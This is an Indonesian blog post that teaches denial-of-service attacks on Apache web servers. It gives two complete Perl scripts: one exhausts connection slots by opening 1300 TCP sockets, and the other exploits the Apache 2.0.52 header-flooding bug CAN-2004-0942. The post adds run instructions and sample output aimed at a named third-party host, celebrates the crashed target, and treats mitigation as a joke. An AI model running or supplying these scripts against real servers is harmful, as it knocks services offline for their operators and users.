Simple Denial of Services Attack


Denial of Services adalah salah satu serangan para Attacker untuk melumpuhkan target, atau cara terakhir, kalau si attacker sudah tidak punya akal lagi untuk menembus target yang ingin di kuasainya.

DOS adalah penyerangan dengan metode pengiriman paket-paket (flooding) secara simultan dengan satu atau lebih komputer atau komputer zombie untuk dikirimkan ke satu target, di bawah ini adalah beberapa dari aktifitas DOS ;

1. Aktifitas ‘flooding’ terhadap suatu server.

2. Memutuskan koneksi antara 2 mesin.

3. Mencegah korban untuk dapat menggunakan layanan.

4. Merusak sistem agar korban tidak dapat menggunakan layanan.

Aktifitas DOS biasanya menyerang untuk menghabiskan bandwith sasaran, Swap Space, RAM, Disk, cache, atau INETD. Sekarang kita membahas salah satu kelemahan Apache Web Server yang bisa kita eksploitasi untuk kelemahan Denial of services adalah jumlah kapasitas koneksi. terdapat pada konfigurasi httpd yaitu MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.

Dibawah ini kita coba eksploitasi dengan bahasan di atas, yaitu menghabiskan jumlah total koneksi yang di perbolehkan, eksploits ini dibuat oleh moby salah satu staf echo.or.id.

——————–start——————————-

#!/usr/bin/perl
#
# Nama Script  : gs.pl
# Tipe         : Denial of Service (DoS)
# Auth         : MOBY || eCHo –> moby@echo.or.id || mobygeek@telkom.net
# URL          : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print “Gunakan: perl gs.pl [host] [port] n”;
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> “$ARGV[0]“,
PeerPort=> “$ARGV[1]“,
Proto => “tcp”
or die; print “$_n”
}

——————–end——————————–

simpan dengan nama jalankan program di atassimpan dengan nama gs.pl, jalankan pada mesin linux, jika di windows gunakanlah active perl.
dan lakukanlah pada beberapa login shell linux anda.

root@slacker:~# chmod +x gs.pl
root@slacker:~# ./gs.pl server.slackware.org 3306
1
2
3
4
————cut—————-
1018
1019
1020
1021
IO::Socket::INET: Bad protocol ‘tcp’    …propagated at ./gs.pl line 14.
root@slacker:~#

coba akses target anda yang seolah-olah mati :)

crashed

Nah sekarang kita akan melakukan DOS dengan mengirimkan paket beberapa ribu trys, lebih lanjut dengan bugs ini, silahkan anda baca sendiri di http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942 baca ya,, males untuk diulas lagi,heheh,, :)

eksploits ;

#!/usr/bin/perl

# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->
#
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see “Eror 500″ you are lucky man :)
#
# Warnings ->
#             This is POC code you can use only on you own servers. Writer don’t response if you damadge you servers or
#             use it for attack, or others things.
#
# Shit ->
#             My English now is bulls shit :( I try study it :)
#

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
{
print “n ::: ———————————————- :::n”;
print ” ::: Another yet DoS exploit for Apache <= 2.0.52   :::n”;
print ” ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::n”;
print ” ::: Coded by GreenwooD from Network Security Team  :::n”;
print ” ::: ———————————————- :::n”;
exit();
}

print “n <+> Prepare to start connect.n”;

$s = IO::Socket::INET->new(Proto=>”tcp”,
PeerAddr=>$ARGV[0],
PeerPort=>80,
Timeout=>6
) or die ” <-> Target web server already DoSeD ??? or can’t connect :( n”;
$s->autoflush();

print ” <+> Connected to $ARGV[0]n”;
print ” <+> Send of first part of devil header.n”;

print $s “GET / HTTP/1.0n”;

$trys = 8000; # Default

if ($ARGV[1])
{
$trys = $ARGV[1];
}

print ” <+> Prepare to DoS with $trys trys.n”;
print ” <+> Start DoS send second part of devil header.n”;
print ” <SOD> |”;

$i=0;

do {

print $s (” ” x 8000 . “n”);

if ($i % 500 == 0)
{
print “=”;
}

++$i;

} until ($i == $trys);

print “> <EOD>n”;

close($s);

print ” <+> Ok now target web server maybe DoSeD.n”;

—end ofcode—

Hanya dalam kurang dari 10 menit sudah mengirimkan packet sebanyak 2.5 GB !!!

mscreen1

+++++++++++++++++++++

++PNANGGULANGAN DOS++

+++++++++++++++++++++

1. Matikan service-service pada mesin anda untuk daemon yang tidak terlalu penting atau jarang di pakai.

2. Selalu update otak anda pada bugs-bugs yang beredar tiap harinta di situs-situs security.

3. Matikan komputer anda.

referensi;

Serangan Denial of Service – moby

packetstormsecurity.nl

milw0rm.org

One thought on “Simple Denial of Services Attack

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s